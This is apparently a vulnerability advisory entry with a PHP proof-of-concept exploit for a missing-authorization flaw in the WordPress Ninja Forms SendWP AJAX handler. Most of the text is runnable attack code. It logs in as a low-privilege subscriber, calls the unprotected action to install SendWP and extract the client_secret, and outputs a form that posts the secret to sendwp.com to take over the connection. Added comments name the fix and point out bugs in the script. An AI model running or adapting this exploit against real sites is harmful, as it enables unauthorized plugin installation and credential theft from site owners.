The AJAX action, wp_ajax_ninja_forms_sendwp_remote_install_handler, had neither a capability check nor any nonce protection, which made it possible for low-privilege users, such as subscribers, to install and activate the SendWP plugin and to retrieve the client_secret key needed to establish the SendWP connection.
Usage: php poc.php subscriber password Take the html output and use that to create a form that allows you to make the SendWP connection.
<?php
// Proof of concept for the issue described above: the
// wp_ajax_ninja_forms_sendwp_remote_install_handler AJAX action was reachable
// by any logged-in user because the handler performed neither a nonce check
// nor a capability check. The plugin-side hardening is to gate the handler
// with check_ajax_referer() and current_user_can('install_plugins') before it
// does any work; with that in place the request below is rejected.
//
// Settings
// $argv[1] = site URL, $argv[2] = username, $argv[3] = password
// (the advisory states a subscriber-level account is sufficient).
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// Log in as subscriber: a normal wp-login.php form post, with the session
// cookie persisted to a temp cookie jar that the second request reuses.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log' => $wp_user,
    'pwd' => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Call the AJAX action with only the subscriber's session cookie. Note that
// no nonce field is sent at all, which is exactly what the missing
// check_ajax_referer() call allowed. (The original comment here, "Set
// redirect url", did not describe this request.)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'ninja_forms_sendwp_remote_install',
]);
$content = curl_exec($ch);

// Pull four fields out of the handler's JSON response with plain regexes.
// $pattern is a single backslash; stripping it presumably undoes the "\/"
// escaping json_encode applies to URLs — confirm against a real response.
// NOTE(review): none of the preg_match() results are checked, so on a patched
// site (no such fields in the response) $matches[1] is undefined and the
// script emits warnings rather than reporting "not vulnerable" cleanly.
// The second curl handle is also never curl_close()d.
$pattern = '\\';
$replacement = '';
preg_match('/"client_secret":"([^"]+)"/', $content, $matches);
$match1 = $matches[1];
$client_secret = str_replace($pattern, $replacement, $match1);
preg_match('/"register_url":"([^"]+)"/', $content, $matches);
$match2 = $matches[1];
$register_url = str_replace($pattern, $replacement, $match2);
preg_match('/"client_name":"([^"]+)"/', $content, $matches);
$match3 = $matches[1];
$client_name = str_replace($pattern, $replacement, $match3);
preg_match('/"client_redirect":"([^"]+)"/', $content, $matches);
$match4 = $matches[1];
$client_redirect = str_replace($pattern, $replacement, $match4);

// Emit a minimal HTML page whose form re-posts the extracted values to the
// SendWP signup endpoint (the "html output" the usage line refers to).
// Values are echoed without htmlspecialchars(), so any of them containing a
// double quote would break the attribute it is placed in.
echo '<html>';
echo '<body>';
echo '<form action="https://sendwp.com/_/signup" method="POST">';
echo '<input type="hidden" name="client_name" value="' . $client_name .'" />';
echo '<input type="hidden" name="client_url" value="' . $register_url . '" />';
echo '<input type="hidden" name="client_redirect" value="' . $client_redirect . '" />';
echo '<input type="hidden" name="client_secret" value="' . $client_secret . '" />';
echo '<input type="submit" value="Submit request" />';
echo '</form>';
echo '</body>';
echo '</html>';
?>
Chloe Chamberland
Chloe Chamberland
Yes
2021-02-16 (about 1 years ago)
2021-02-17 (about 1 years ago)
2021-02-22 (about 1 years ago)